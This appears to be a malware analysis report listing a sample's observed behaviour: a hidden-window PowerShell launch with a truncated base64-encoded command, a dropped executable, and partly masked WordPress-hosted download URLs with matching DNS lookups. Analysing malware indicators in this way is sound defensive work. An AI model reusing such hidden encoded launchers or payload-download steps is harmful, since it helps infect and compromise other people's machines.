Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABGAG0AZgB4AGcAdwB0AHEAeAB1AHoAdgB4AD0AJwBNAGIAZwBkAGIAYgB2AHgAagBnAGcAZAAnADsAJABOAG0AegBnAGcAYQBuAHYAaQBqACAAPQAgACcAOAA2ADUAJwA7ACQAUwBwAGgAbABmAGwAbAB2AGoAeQB5AD0AJwBTAG4AZAB...
- %HOMEPATH%\865.exe
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\865.exe
- http://www.th##to.com/wp-content/plugins/Kk685629/
- http://bl##.##stcommerz.com/wp-content/languages/JdF/
- http://os###edia.com/wp-content/FjqkF46951/
- http://ba####tuc60.info/9b27905b275987900e62033d319ca929/aM215266/
- DNS ASK th##to.com
- DNS ASK bl##.##stcommerz.com
- DNS ASK os###edia.com
- DNS ASK bl##.#chlichte.xyz
- DNS ASK ba####tuc60.info
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABGAG0AZgB4AGcAdwB0AHEAeAB1AHoAdgB4AD0AJwBNAGIAZwBkAGIAYgB2AHgAagBnAGcAZAAnADsAJABOAG0AegBnAGcAYQBuAHYAaQBqACAAPQAgACcAOAA2ADUAJwA7ACQAUwBwAGgAbABmAGwAbAB2AGoAeQB5AD0AJwBTAG4AZAB...' (with a hidden window)